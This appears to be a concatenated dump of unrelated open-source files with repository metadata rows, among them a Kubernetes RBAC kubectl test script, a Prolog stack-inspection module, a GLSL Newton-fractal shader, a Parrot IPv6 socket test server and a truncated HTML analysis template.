# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
set -o errexit
set -o nounset
set -o pipefail
run_clusterroles_tests() {
set -o nounset
set -o errexit
create_and_use_new_namespace
kube::log::status "Testing clusterroles"
# make sure the server was properly bootstrapped with clusterroles and bindings
kube::test::get_object_assert clusterroles/cluster-admin "{{.metadata.name}}" 'cluster-admin'
kube::test::get_object_assert clusterrolebindings/cluster-admin "{{.metadata.name}}" 'cluster-admin'
# Pre-condition: no ClusterRole pod-admin exists
output_message=$(! kubectl get clusterrole pod-admin 2>&1 "${kube_flags[@]:?}")
kube::test::if_has_string "${output_message}" 'clusterroles.rbac.authorization.k8s.io "pod-admin" not found'
# Dry-run test `kubectl create clusterrole`
kubectl create "${kube_flags[@]:?}" clusterrole pod-admin --dry-run=client --verb=* --resource=pods
kubectl create "${kube_flags[@]:?}" clusterrole pod-admin --dry-run=server --verb=* --resource=pods
output_message=$(! kubectl get clusterrole pod-admin 2>&1 "${kube_flags[@]:?}")
kube::test::if_has_string "${output_message}" 'clusterroles.rbac.authorization.k8s.io "pod-admin" not found'
# test `kubectl create clusterrole`
kubectl create "${kube_flags[@]:?}" clusterrole pod-admin --verb=* --resource=pods
kube::test::get_object_assert clusterrole/pod-admin "{{range.rules}}{{range.verbs}}{{.}}:{{end}}{{end}}" '\*:'
output_message=$(kubectl delete clusterrole pod-admin -n test 2>&1 "${kube_flags[@]}")
kube::test::if_has_string "${output_message}" 'warning: deleting cluster-scoped resources'
kube::test::if_has_string "${output_message}" 'clusterrole.rbac.authorization.k8s.io "pod-admin" deleted'
kubectl create "${kube_flags[@]}" clusterrole pod-admin --verb=* --resource=pods
kube::test::get_object_assert clusterrole/pod-admin "{{range.rules}}{{range.verbs}}{{.}}:{{end}}{{end}}" '\*:'
kube::test::get_object_assert clusterrole/pod-admin "{{range.rules}}{{range.resources}}{{.}}:{{end}}{{end}}" 'pods:'
kube::test::get_object_assert clusterrole/pod-admin "{{range.rules}}{{range.apiGroups}}{{.}}:{{end}}{{end}}" ':'
kubectl create "${kube_flags[@]}" clusterrole resource-reader --verb=get,list --resource=pods,deployments.apps
kube::test::get_object_assert clusterrole/resource-reader "{{range.rules}}{{range.verbs}}{{.}}:{{end}}{{end}}" 'get:list:get:list:'
kube::test::get_object_assert clusterrole/resource-reader "{{range.rules}}{{range.resources}}{{.}}:{{end}}{{end}}" 'pods:deployments:'
kube::test::get_object_assert clusterrole/resource-reader "{{range.rules}}{{range.apiGroups}}{{.}}:{{end}}{{end}}" ':apps:'
kubectl create "${kube_flags[@]}" clusterrole resourcename-reader --verb=get,list --resource=pods --resource-name=foo
kube::test::get_object_assert clusterrole/resourcename-reader "{{range.rules}}{{range.verbs}}{{.}}:{{end}}{{end}}" 'get:list:'
kube::test::get_object_assert clusterrole/resourcename-reader "{{range.rules}}{{range.resources}}{{.}}:{{end}}{{end}}" 'pods:'
kube::test::get_object_assert clusterrole/resourcename-reader "{{range.rules}}{{range.apiGroups}}{{.}}:{{end}}{{end}}" ':'
kube::test::get_object_assert clusterrole/resourcename-reader "{{range.rules}}{{range.resourceNames}}{{.}}:{{end}}{{end}}" 'foo:'
kubectl create "${kube_flags[@]}" clusterrole url-reader --verb=get --non-resource-url=/logs/* --non-resource-url=/healthz/*
kube::test::get_object_assert clusterrole/url-reader "{{range.rules}}{{range.verbs}}{{.}}:{{end}}{{end}}" 'get:'
kube::test::get_object_assert clusterrole/url-reader "{{range.rules}}{{range.nonResourceURLs}}{{.}}:{{end}}{{end}}" '/logs/\*:/healthz/\*:'
kubectl create "${kube_flags[@]}" clusterrole aggregation-reader --aggregation-rule="foo1=foo2"
kube::test::get_object_assert clusterrole/aggregation-reader "{{${id_field:?}}}" 'aggregation-reader'
# Pre-condition: no ClusterRoleBinding super-admin exists
output_message=$(! kubectl get clusterrolebinding super-admin 2>&1 "${kube_flags[@]}")
kube::test::if_has_string "${output_message}" 'clusterrolebindings.rbac.authorization.k8s.io "super-admin" not found'
# Dry-run test `kubectl create clusterrolebinding`
kubectl create "${kube_flags[@]}" clusterrolebinding super-admin --dry-run=client --clusterrole=admin --user=super-admin
kubectl create "${kube_flags[@]}" clusterrolebinding super-admin --dry-run=server --clusterrole=admin --user=super-admin
output_message=$(! kubectl get clusterrolebinding super-admin 2>&1 "${kube_flags[@]}")
kube::test::if_has_string "${output_message}" 'clusterrolebindings.rbac.authorization.k8s.io "super-admin" not found'
# test `kubectl create clusterrolebinding`
# test `kubectl set subject clusterrolebinding`
kubectl create "${kube_flags[@]}" clusterrolebinding super-admin --clusterrole=admin --user=super-admin
kube::test::get_object_assert clusterrolebinding/super-admin "{{range.subjects}}{{.name}}:{{end}}" 'super-admin:'
kubectl set subject --dry-run=client "${kube_flags[@]}" clusterrolebinding super-admin --user=foo
kubectl set subject --dry-run=server "${kube_flags[@]}" clusterrolebinding super-admin --user=foo
kube::test::get_object_assert clusterrolebinding/super-admin "{{range.subjects}}{{.name}}:{{end}}" 'super-admin:'
kubectl set subject "${kube_flags[@]}" clusterrolebinding super-admin --user=foo
kube::test::get_object_assert clusterrolebinding/super-admin "{{range.subjects}}{{.name}}:{{end}}" 'super-admin:foo:'
kubectl create "${kube_flags[@]}" clusterrolebinding multi-users --clusterrole=admin --user=user-1 --user=user-2
kube::test::get_object_assert clusterrolebinding/multi-users "{{range.subjects}}{{.name}}:{{end}}" 'user-1:user-2:'
kubectl create "${kube_flags[@]}" clusterrolebinding super-group --clusterrole=admin --group=the-group
kube::test::get_object_assert clusterrolebinding/super-group "{{range.subjects}}{{.name}}:{{end}}" 'the-group:'
kubectl set subject "${kube_flags[@]}" clusterrolebinding super-group --group=foo
kube::test::get_object_assert clusterrolebinding/super-group "{{range.subjects}}{{.name}}:{{end}}" 'the-group:foo:'
kubectl create "${kube_flags[@]}" clusterrolebinding multi-groups --clusterrole=admin --group=group-1 --group=group-2
kube::test::get_object_assert clusterrolebinding/multi-groups "{{range.subjects}}{{.name}}:{{end}}" 'group-1:group-2:'
kubectl create "${kube_flags[@]}" clusterrolebinding super-sa --clusterrole=admin --serviceaccount=otherns:sa-name
kube::test::get_object_assert clusterrolebinding/super-sa "{{range.subjects}}{{.namespace}}:{{end}}" 'otherns:'
kube::test::get_object_assert clusterrolebinding/super-sa "{{range.subjects}}{{.name}}:{{end}}" 'sa-name:'
kubectl set subject "${kube_flags[@]}" clusterrolebinding super-sa --serviceaccount=otherfoo:foo
kube::test::get_object_assert clusterrolebinding/super-sa "{{range.subjects}}{{.namespace}}:{{end}}" 'otherns:otherfoo:'
kube::test::get_object_assert clusterrolebinding/super-sa "{{range.subjects}}{{.name}}:{{end}}" 'sa-name:foo:'
# test `kubectl set subject clusterrolebinding --all`
kubectl set subject "${kube_flags[@]}" clusterrolebinding --all --user=test-all-user
kube::test::get_object_assert clusterrolebinding/super-admin "{{range.subjects}}{{.name}}:{{end}}" 'super-admin:foo:test-all-user:'
kube::test::get_object_assert clusterrolebinding/super-group "{{range.subjects}}{{.name}}:{{end}}" 'the-group:foo:test-all-user:'
kube::test::get_object_assert clusterrolebinding/super-sa "{{range.subjects}}{{.name}}:{{end}}" 'sa-name:foo:test-all-user:'
# test `kubectl create rolebinding`
# test `kubectl set subject rolebinding`
kubectl create "${kube_flags[@]}" rolebinding admin --dry-run=client --clusterrole=admin --user=default-admin
kubectl create "${kube_flags[@]}" rolebinding admin --dry-run=server --clusterrole=admin --user=default-admin
output_message=$(! kubectl get rolebinding/admin 2>&1 "${kube_flags[@]}")
kube::test::if_has_string "${output_message}" ' not found'
kubectl create "${kube_flags[@]}" rolebinding admin --clusterrole=admin --user=default-admin
kube::test::get_object_assert rolebinding/admin "{{.roleRef.kind}}" 'ClusterRole'
kube::test::get_object_assert rolebinding/admin "{{range.subjects}}{{.name}}:{{end}}" 'default-admin:'
kubectl set subject "${kube_flags[@]}" rolebinding admin --user=foo
kube::test::get_object_assert rolebinding/admin "{{range.subjects}}{{.name}}:{{end}}" 'default-admin:foo:'
kubectl create "${kube_flags[@]}" rolebinding localrole --role=localrole --group=the-group
kube::test::get_object_assert rolebinding/localrole "{{.roleRef.kind}}" 'Role'
kube::test::get_object_assert rolebinding/localrole "{{range.subjects}}{{.name}}:{{end}}" 'the-group:'
kubectl set subject "${kube_flags[@]}" rolebinding localrole --group=foo
kube::test::get_object_assert rolebinding/localrole "{{range.subjects}}{{.name}}:{{end}}" 'the-group:foo:'
kubectl create "${kube_flags[@]}" rolebinding sarole --role=localrole --serviceaccount=otherns:sa-name
kube::test::get_object_assert rolebinding/sarole "{{range.subjects}}{{.namespace}}:{{end}}" 'otherns:'
kube::test::get_object_assert rolebinding/sarole "{{range.subjects}}{{.name}}:{{end}}" 'sa-name:'
kubectl set subject "${kube_flags[@]}" rolebinding sarole --serviceaccount=otherfoo:foo
kube::test::get_object_assert rolebinding/sarole "{{range.subjects}}{{.namespace}}:{{end}}" 'otherns:otherfoo:'
kube::test::get_object_assert rolebinding/sarole "{{range.subjects}}{{.name}}:{{end}}" 'sa-name:foo:'
# test `kubectl set subject rolebinding --all`
kubectl set subject "${kube_flags[@]}" rolebinding --all --user=test-all-user
kube::test::get_object_assert rolebinding/admin "{{range.subjects}}{{.name}}:{{end}}" 'default-admin:foo:test-all-user:'
kube::test::get_object_assert rolebinding/localrole "{{range.subjects}}{{.name}}:{{end}}" 'the-group:foo:test-all-user:'
kube::test::get_object_assert rolebinding/sarole "{{range.subjects}}{{.name}}:{{end}}" 'sa-name:foo:test-all-user:'
# Describe command should respect the chunk size parameter
kube::test::describe_resource_chunk_size_assert clusterrolebindings
kube::test::describe_resource_chunk_size_assert clusterroles
set +o nounset
set +o errexit
}
run_role_tests() {
set -o nounset
set -o errexit
create_and_use_new_namespace
kube::log::status "Testing role"
# Dry-run create
kubectl create "${kube_flags[@]}" role pod-admin --dry-run=client --verb=* --resource=pods
kubectl create "${kube_flags[@]}" role pod-admin --dry-run=server --verb=* --resource=pods
output_message=$(! kubectl get role/pod-admin 2>&1 "${kube_flags[@]}")
kube::test::if_has_string "${output_message}" ' not found'
# Create Role from command (only resource)
kubectl create "${kube_flags[@]}" role pod-admin --verb=* --resource=pods
kube::test::get_object_assert role/pod-admin "{{range.rules}}{{range.verbs}}{{.}}:{{end}}{{end}}" '\*:'
kube::test::get_object_assert role/pod-admin "{{range.rules}}{{range.resources}}{{.}}:{{end}}{{end}}" 'pods:'
kube::test::get_object_assert role/pod-admin "{{range.rules}}{{range.apiGroups}}{{.}}:{{end}}{{end}}" ':'
output_message=$(! kubectl create "${kube_flags[@]}" role invalid-pod-admin --verb=* --resource=invalid-resource 2>&1)
kube::test::if_has_string "${output_message}" "the server doesn't have a resource type \"invalid-resource\""
# Create Role from command (resource + group)
kubectl create "${kube_flags[@]}" role group-reader --verb=get,list --resource=deployments.apps
kube::test::get_object_assert role/group-reader "{{range.rules}}{{range.verbs}}{{.}}:{{end}}{{end}}" 'get:list:'
kube::test::get_object_assert role/group-reader "{{range.rules}}{{range.resources}}{{.}}:{{end}}{{end}}" 'deployments:'
kube::test::get_object_assert role/group-reader "{{range.rules}}{{range.apiGroups}}{{.}}:{{end}}{{end}}" 'apps:'
output_message=$(! kubectl create "${kube_flags[@]}" role invalid-group --verb=get,list --resource=deployments.invalid-group 2>&1)
kube::test::if_has_string "${output_message}" "the server doesn't have a resource type \"deployments\" in group \"invalid-group\""
# Create Role from command (resource / subresource)
kubectl create "${kube_flags[@]}" role subresource-reader --verb=get,list --resource=pods/status
kube::test::get_object_assert role/subresource-reader "{{range.rules}}{{range.verbs}}{{.}}:{{end}}{{end}}" 'get:list:'
kube::test::get_object_assert role/subresource-reader "{{range.rules}}{{range.resources}}{{.}}:{{end}}{{end}}" 'pods/status:'
kube::test::get_object_assert role/subresource-reader "{{range.rules}}{{range.apiGroups}}{{.}}:{{end}}{{end}}" ':'
# Create Role from command (resource + group / subresource)
kubectl create "${kube_flags[@]}" role group-subresource-reader --verb=get,list --resource=replicasets.apps/scale
kube::test::get_object_assert role/group-subresource-reader "{{range.rules}}{{range.verbs}}{{.}}:{{end}}{{end}}" 'get:list:'
kube::test::get_object_assert role/group-subresource-reader "{{range.rules}}{{range.resources}}{{.}}:{{end}}{{end}}" 'replicasets/scale:'
kube::test::get_object_assert role/group-subresource-reader "{{range.rules}}{{range.apiGroups}}{{.}}:{{end}}{{end}}" 'apps:'
output_message=$(! kubectl create "${kube_flags[@]}" role invalid-group --verb=get,list --resource=rs.invalid-group/scale 2>&1)
kube::test::if_has_string "${output_message}" "the server doesn't have a resource type \"rs\" in group \"invalid-group\""
# Create Role from command (resource + resourcename)
kubectl create "${kube_flags[@]}" role resourcename-reader --verb=get,list --resource=pods --resource-name=foo
kube::test::get_object_assert role/resourcename-reader "{{range.rules}}{{range.verbs}}{{.}}:{{end}}{{end}}" 'get:list:'
kube::test::get_object_assert role/resourcename-reader "{{range.rules}}{{range.resources}}{{.}}:{{end}}{{end}}" 'pods:'
kube::test::get_object_assert role/resourcename-reader "{{range.rules}}{{range.apiGroups}}{{.}}:{{end}}{{end}}" ':'
kube::test::get_object_assert role/resourcename-reader "{{range.rules}}{{range.resourceNames}}{{.}}:{{end}}{{end}}" 'foo:'
# Create Role from command (multi-resources)
kubectl create "${kube_flags[@]}" role resource-reader --verb=get,list --resource=pods/status,deployments.apps
kube::test::get_object_assert role/resource-reader "{{range.rules}}{{range.verbs}}{{.}}:{{end}}{{end}}" 'get:list:get:list:'
kube::test::get_object_assert role/resource-reader "{{range.rules}}{{range.resources}}{{.}}:{{end}}{{end}}" 'pods/status:deployments:'
kube::test::get_object_assert role/resource-reader "{{range.rules}}{{range.apiGroups}}{{.}}:{{end}}{{end}}" ':apps:'
# Describe command should respect the chunk size parameter
kube::test::describe_resource_chunk_size_assert roles
kube::test::describe_resource_chunk_size_assert rolebindings
set +o nounset
set +o errexit
}
| Shell | 5 | 767829413/kubernetes | test/cmd/rbac.sh | [
"Apache-2.0"
] |
/**
* @file library/hacks.yap
* @author VITOR SANTOS COSTA <vsc@VITORs-MBP.lan>
* @date Tue Nov 17 19:00:25 2015
*
* @brief Prolog hacking
*
*
*/
:- module(yap_hacks, [
current_choicepoint/1,
parent_choicepoint/1,
parent_choicepoint/2,
cut_by/1,
cut_at/1,
current_choicepoints/1,
choicepoint/7,
current_continuations/1,
continuation/4,
stack_dump/0,
stack_dump/1,
enable_interrupts/0,
disable_interrupts/0,
virtual_alarm/3,
alarm/3,
fully_strip_module/3,
context_variables/1
]).
/**
* @addtogroup Hacks
* @{
* @brief Manipulate the Prolog stacks, including setting and resetting
* choice-points.
*
**/
/**
* @pred stack_dump
*
* Write the current ancestor stack to the outout. Ancestors may have:
* - terminated
* - still have sub-goals to execute, if so, they left an _environment_
* - still have clauses they may nacktrack to; if so, they left a _choice point_
*
*/
stack_dump :-
stack_dump(-1).
/**
* @pred stack_dump(+N)
*
* Report the last _N_ entries in the stack (see stack_dump/0)
*/
stack_dump(Max) :-
current_choicepoints(CPs),
current_continuations([Env|Envs]),
continuation(Env,_,ContP,_),
length(CPs, LCPs),
length(Envs, LEnvs),
format(user_error,'~n~n~tStack Dump~t~40+~n~nAddress~tChoiceP~16+ Cur/Next Clause Goal~n',[LCPs,LEnvs]),
'$hacks':display_stack_info(CPs, Envs, Max, ContP, StackInfo, []),
run_formats(StackInfo, user_error).
run_formats([], _).
run_formats([Com-Args|StackInfo], Stream) :-
format(Stream, Com, Args),
run_formats(StackInfo, user_error).
/**
* @pred virtual_alarm(+Interval, 0:Goal, -Left)
*
* Activate an alarm to execute _Goal_ in _Interval_ seconds. If the alarm was active,
* bind _Left_ to the previous value.
*
* If _Interval_ is 0, disable the current alarm.
*/
virtual_alarm(Interval, Goal, Left) :-
Interval == 0, !,
'$virtual_alarm'(0, 0, Left0, _),
on_signal(sig_vtalarm, _, Goal),
Left = Left0.
virtual_alarm(Interval, Goal, Left) :-
integer(Interval), !,
on_signal(sig_vtalarm, _, Goal),
'$virtual_alarm'(Interval, 0, Left, _).
virtual_alarm([Interval|USecs], Goal, [Left|LUSecs]) :-
on_signal(sig_vtalarm, _, Goal),
'$virtual_alarm'(Interval, USecs, Left, LUSecs).
%% @}
| Prolog | 5 | KuroLevin/yap-6.3 | library/hacks.yap | [
"Artistic-1.0-Perl",
"ClArtistic"
] |
<script>
...
<?php
foreach($actID AS $act) {
echo 'divNames.push(\'[nid='.$act.']\');';
}
?>
...
</script> | PHP | 2 | sbj42/vscode | extensions/vscode-colorize-tests/test/colorize-fixtures/issue-28354.php | [
"MIT"
] |
==== Pros and Cons ====
~+: high performance in SMP environments%%%
~+: no thread contention in Java%%%
~-: cache update can loose some entries%%%
~-: still some thread contention in Ada but limited to copying a reference ~(C.Set~)
| Creole | 0 | jquorning/ada-wiki | regtests/expect/wiki-convert/break.creole | [
"Apache-2.0"
] |
from django.http import HttpResponse
from django.views.decorators.http import condition, etag, last_modified
from .tests import ETAG, FULL_RESPONSE, LAST_MODIFIED, WEAK_ETAG
@condition(lambda r: ETAG, lambda r: LAST_MODIFIED)
def index(request):
return HttpResponse(FULL_RESPONSE)
@condition(last_modified_func=lambda r: LAST_MODIFIED)
def last_modified_view1(request):
return HttpResponse(FULL_RESPONSE)
@last_modified(lambda r: LAST_MODIFIED)
def last_modified_view2(request):
return HttpResponse(FULL_RESPONSE)
@condition(etag_func=lambda r: ETAG)
def etag_view1(request):
return HttpResponse(FULL_RESPONSE)
@etag(lambda r: ETAG)
def etag_view2(request):
return HttpResponse(FULL_RESPONSE)
@condition(etag_func=lambda r: ETAG.strip('"'))
def etag_view_unquoted(request):
"""
Use an etag_func() that returns an unquoted ETag.
"""
return HttpResponse(FULL_RESPONSE)
@condition(etag_func=lambda r: WEAK_ETAG)
def etag_view_weak(request):
"""
Use an etag_func() that returns a weak ETag.
"""
return HttpResponse(FULL_RESPONSE)
@condition(etag_func=lambda r: None)
def etag_view_none(request):
"""
Use an etag_func() that returns None, as opposed to setting etag_func=None.
"""
return HttpResponse(FULL_RESPONSE)
| Python | 5 | jpmallarino/django | tests/conditional_processing/views.py | [
"BSD-3-Clause",
"0BSD"
] |
#!/usr/bin/env bash
set -eu -o pipefail
readonly safeBranchName="$(echo $1 | sed 's/^pull\//pr/' | sed 's/[^A-Za-z0-9_.-]/_/g')"
readonly shortLastSha="$(git rev-parse --short $2)"
readonly inputDir="$PROJECT_ROOT/$3"
readonly outputDir="$PROJECT_ROOT/$4"
readonly fileSuffix="-$safeBranchName-$shortLastSha.tgz"
echo "Creating compressed archives for packages in '$inputDir'."
# Create or clean-up the output directory.
echo " Preparing output directory: $outputDir"
rm -rf "$outputDir"
mkdir -p "$outputDir"
# If there are more than one packages in `$inputDir`...
if [[ $(ls -1 "$inputDir" | wc -l) -gt 1 ]]; then
# Create a compressed archive containing all packages.
# (This is useful for copying all packages into `node_modules/` (without changing `package.json`).)
outputFileName=all$fileSuffix
echo " Creating archive with all packages --> '$outputFileName'..."
tar --create --gzip --directory "$inputDir" --file "$outputDir/$outputFileName" --transform s/^\./packages/ .
fi
# Create a compressed archive for each package.
# (This is useful for referencing the path/URL to the resulting archive in `package.json`.)
for dir in $inputDir/*
do
packageName=`basename "$dir"`
outputFileName="$packageName$fileSuffix"
outputFilePath="$outputDir/$outputFileName"
echo " Processing package '$packageName' --> '$outputFileName'..."
tar --create --gzip --directory "$dir" --file "$outputFilePath" --transform s/^\./package/ .
done
echo "Done creating compressed archives."
| Shell | 4 | duluca/angular | scripts/ci/create-package-archives.sh | [
"MIT"
] |
1471363607304 1 1 0
1471363641847 1 1 0
1471363676458 1 1 0
1471363711106 3 3 348
1471363745953 3 3 348
1471363780623 3 3 348
1471363815046 3 3 348
1471363849590 3 3 27
| IDL | 0 | cegonse/tfm | stats/hpa_2016-08-16T16:11:15.067Z.dlm | [
"MIT"
] |
@import url("//unpkg.com/xyz/test.css");
| CSS | 0 | acidburn0zzz/parcel | packages/core/integration-tests/test/integration/html-protocol-relative/index.css | [
"MIT"
] |
describe("should be able to return Int value through two levels of generic functions", ||
v := kablooey(Int)
expect(42, v)
)
// support code
blooey: func <T> (T: Class) -> T {
match T {
case Int => 42
}
}
kablooey: func <T> (T: Class) -> T {
blooey(T)
}
| ooc | 4 | shamanas/rock | test/compiler/functions/generic-return2.ooc | [
"MIT"
] |
#version 330
uniform vec3 light_source_position;
uniform float gloss;
uniform float shadow;
uniform float focal_distance;
uniform vec4 color0;
uniform vec4 color1;
uniform vec4 color2;
uniform vec4 color3;
uniform vec4 color4;
uniform vec2 coef0;
uniform vec2 coef1;
uniform vec2 coef2;
uniform vec2 coef3;
uniform vec2 coef4;
uniform vec2 coef5;
uniform vec2 root0;
uniform vec2 root1;
uniform vec2 root2;
uniform vec2 root3;
uniform vec2 root4;
uniform float n_roots;
uniform float n_steps;
uniform float julia_highlight;
uniform float saturation_factor;
uniform float black_for_cycles;
uniform float is_parameter_space;
uniform vec2 frame_shape;
in vec3 xyz_coords;
out vec4 frag_color;
#INSERT finalize_color.glsl
#INSERT complex_functions.glsl
const int MAX_DEGREE = 5;
const float CLOSE_ENOUGH = 1e-3;
vec2 poly(vec2 z, vec2[MAX_DEGREE + 1] coefs){
vec2 result = vec2(0.0);
for(int n = 0; n < int(n_roots) + 1; n++){
result += complex_mult(coefs[n], complex_pow(z, n));
}
return result;
}
vec2 dpoly(vec2 z, vec2[MAX_DEGREE + 1] coefs){
vec2 result = vec2(0.0);
for(int n = 1; n < int(n_roots) + 1; n++){
result += n * complex_mult(coefs[n], complex_pow(z, n - 1));
}
return result;
}
vec2 seek_root(vec2 z, vec2[MAX_DEGREE + 1] coefs, int max_steps, out float n_iters){
float last_len;
float curr_len;
float threshold = CLOSE_ENOUGH;
for(int i = 0; i < max_steps; i++){
last_len = curr_len;
n_iters = float(i);
vec2 step = complex_div(poly(z, coefs), dpoly(z, coefs));
curr_len = length(step);
if(curr_len < threshold){
break;
}
z = z - step;
}
n_iters -= clamp((threshold - curr_len) / (last_len - curr_len), 0.0, 1.0);
return z;
}
void main() {
vec2[MAX_DEGREE + 1] coefs = vec2[MAX_DEGREE + 1](coef0, coef1, coef2, coef3, coef4, coef5);
vec2[MAX_DEGREE] roots = vec2[MAX_DEGREE](root0, root1, root2, root3, root4);
vec4[MAX_DEGREE] colors = vec4[MAX_DEGREE](color0, color1, color2, color3, color4);
vec2 z = xyz_coords.xy;
if(is_parameter_space > 0){
// In this case, pixel should correspond to one of the roots
roots[2] = xyz_coords.xy;
vec2 r0 = roots[0];
vec2 r1 = roots[1];
vec2 r2 = roots[2];
// It is assumed that the polynomial is cubid...
coefs[0] = -complex_mult(complex_mult(r0, r1), r2);
coefs[1] = complex_mult(r0, r1) + complex_mult(r0, r2) + complex_mult(r1, r2);
coefs[2] = -(r0 + r1 + r2);
coefs[3] = vec2(1.0, 0.0);
// Seed value is always center of the roots
z = -coefs[2] / 3.0;
}
float n_iters;
vec2 found_root = seek_root(z, coefs, int(n_steps), n_iters);
vec4 color = vec4(0.0);
float min_dist = 1e10;
float dist;
for(int i = 0; i < int(n_roots); i++){
dist = distance(roots[i], found_root);
if(dist < min_dist){
min_dist = dist;
color = colors[i];
}
}
color *= 1.0 + (0.01 * saturation_factor) * (n_iters - 5 * saturation_factor);
if(black_for_cycles > 0 && min_dist > CLOSE_ENOUGH){
color = vec4(0.0, 0.0, 0.0, 1.0);
}
if(julia_highlight > 0.0){
float radius = julia_highlight;
vec2[4] samples = vec2[4](
z + vec2(radius, 0.0),
z + vec2(-radius, 0.0),
z + vec2(0.0, radius),
z + vec2(0.0, -radius)
);
for(int i = 0; i < 4; i++){
for(int j = 0; j < n_steps; j++){
vec2 z = samples[i];
z = z - complex_div(poly(z, coefs), dpoly(z, coefs));
samples[i] = z;
}
}
float max_dist = 0.0;
for(int i = 0; i < 4; i++){
max_dist = max(max_dist, distance(samples[i], samples[(i + 1) % 4]));
}
color *= 1.0 * smoothstep(0, 0.1, max_dist);
}
frag_color = finalize_color(
color,
xyz_coords,
vec3(0.0, 0.0, 1.0),
light_source_position,
gloss,
shadow
);
} | GLSL | 4 | OrKedar/geo-manimgl-app | manimlib/shaders/newton_fractal/frag.glsl | [
"MIT"
] |
package com.baeldung.concurrent;
import org.junit.Test;
import edu.umd.cs.mtc.MultithreadedTestCase;
import edu.umd.cs.mtc.TestFramework;
/**
* This is defined as a manual test because it tries to simulate the race conditions
* in a concurrent program that is poorly designed and hence may fail nondeterministically.
* This will help the CI jobs to ignore these tests and a developer to run them manually.
*
*/
public class MyCounterMultithreadedTCManualTest extends MultithreadedTestCase {
private MyCounter counter;
@Override
public void initialize() {
counter = new MyCounter();
}
public void thread1() throws InterruptedException {
counter.increment();
}
public void thread2() throws InterruptedException {
counter.increment();
}
@SuppressWarnings("deprecation")
@Override
public void finish() {
assertEquals(2, counter.getCount());
}
@Test
public void testCounter() throws Throwable {
TestFramework.runManyTimes(new MyCounterMultithreadedTCManualTest(), 1000);
}
}
| Java | 5 | DBatOWL/tutorials | core-java-modules/core-java-concurrency-2/src/test/java/com/baeldung/concurrent/MyCounterMultithreadedTCManualTest.java | [
"MIT"
] |
#!./parrot
# Copyright (C) 2011, Parrot Foundation.
=head1 NAME
t/pmc/testlib/test_server_ipv6.pir - Test server for the Socket PMC (IPv6 version)
=head1 DESCRIPTION
This server process is launched from t/pmc/socket.t to test the Socket PMC.
It listens on localhost:1234 and accepts only one connection. It echoes
everything it reads from that connection back to the client.
Upon successful startup the string "Server started" is printed to stdout.
After a timeout of 3 seconds, the process exits so it doesn't wait forever
in case of test failures.
=cut
.include 'socket.pasm'
.sub main :main
.local pmc sock, address, conn
.local string str
.local int len, status, port
sock = new 'Socket'
sock.'socket'(.PIO_PF_INET6, .PIO_SOCK_STREAM, .PIO_PROTO_TCP)
port = 1234
push_eh error
retry:
address = sock.'getaddrinfo'('::1', port, .PIO_PROTO_TCP, .PIO_PF_INET6, 1)
sock.'bind'(address)
goto started
error:
inc port
if port < 1244 goto retry
pop_eh
say "couldn't bind to a free port, exiting"
exit 1
started:
pop_eh
sock.'listen'(5)
print 'Server started, listening on port '
say port
status = sock.'poll'(1, 3, 0)
# timeout
if status == 0 goto conn_done
conn = sock.'accept'()
str = conn.'local_address'()
print 'Connection from '
say str
# echo incoming data
recv_loop:
status = conn.'poll'(1, 3, 0)
# timeout
if status == 0 goto recv_done
str = conn.'recv'()
len = length str
if len == 0 goto recv_done
conn.'send'(str)
goto recv_loop
recv_done:
conn.'close'()
conn_done:
sock.'close'()
.end
# Local Variables:
# mode: pir
# fill-column: 100
# End:
# vim: expandtab shiftwidth=4 ft=pir:
| Parrot Internal Representation | 5 | winnit-myself/Wifie | t/pmc/testlib/test_server_ipv6.pir | [
"Artistic-2.0"
] |
<html>
<head>
<style type="text/css">
html, body {
width: 100%;
height: 100%;
}
.bgcolor {
background-color: #FFFFFF;
}
.hd {
background-color: #000000;
font-size: 18px;
color: #FFFFFF;
}
.sectionheader {
background-color: #888888;
width:100%;
font-size: 16px;
font-style: bold;
color: #FFFFFF;
/*padding-left: 40px;*/
/*padding-right: 8px;*/
/*padding-top: 2px;*/
/*padding-bottom: 2px;*/
}
.subsectiontop {
background-color: #F5F5FF;
height: 300px;
}
.subsectionbottom {
background-color: #F5F5FF;
height: 540px;
}
h1 {
font-family: Georgia, Times, 'Times New Roman', serif;
font-size: 28px;
font-style: bold;
font-variant: normal;
font-weight: 500;
line-height: 26.4px;
}
h3 {
font-family: Georgia, Times, 'Times New Roman', serif;
font-size: 16px;
font-style: normal;
font-variant: normal;
font-weight: 500;
line-height: 26.4px;
}
div.outerelements {
padding-bottom: 30px;
}
/** Line charts */
path {
stroke: steelblue;
stroke-width: 2;
fill: none;
}
.axis path, .axis line {
fill: none;
stroke: #000;
shape-rendering: crispEdges;
}
.tick line {
opacity: 0.2;
shape-rendering: crispEdges;
}
/** Bar charts */
.bar {
fill: steelblue;
}
rect {
fill: steelblue;
}
.legend rect {
fill:white;
stroke:black;
opacity:0.8;
}
</style>
<title>Data Analysis</title>
</head>
<body style="padding: 0px; margin: 0px" onload="generateContent()">
<#--<meta name="viewport" content="width=device-width, initial-scale=1">-->
<link href="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/css/bootstrap.min.css">
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js"></script>
<link href="http://code.jquery.com/ui/1.11.4/themes/smoothness/jquery-ui.css">
<script src="http://code.jquery.com/jquery-1.10.2.js"></script>
<script src="http://code.jquery.com/ui/1.11.4/jquery-ui.js"></script>
<script src="http://cdnjs.cloudflare.com/ajax/libs/d3/3.5.5/d3.min.js"></script>
<script src="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/js/bootstrap.min.js"></script>
<script>
function generateContent(){
var mainDiv = $('#maindiv');
var div2 = $('#tablesource');
console.log(div2.html());
var div2html = div2.html();
createTable(jQuery.parseJSON(div2html)["RenderableComponentTable"], "Summary Table", $('#tablediv'));
var histdiv = $("#histogramdiv");
<#list histogramIDs as histid>
var div_${histid} = $('#${histid}');
var html_${histid} = div_${histid}.html();
createHistogram(jQuery.parseJSON(html_${histid})["RenderableComponentHistogram"], histdiv, 700, 400);
</#list>
}
function createTable(tableObj, tableId, appendTo) {
//Expect RenderableComponentTable
var header = tableObj['header'];
var values = tableObj['table'];
var title = tableObj['title'];
var border = tableObj['border'];
var padLeft = tableObj['padLeftPx'];
var padRight = tableObj['padRightPx'];
var padTop = tableObj['padTopPx'];
var padBottom = tableObj['padBottomPx'];
var colWidths = tableObj['colWidthsPercent'];
var nRows = (values ? values.length : 0);
var backgroundColor = tableObj['backgroundColor'];
var headerColor = tableObj['headerColor'];
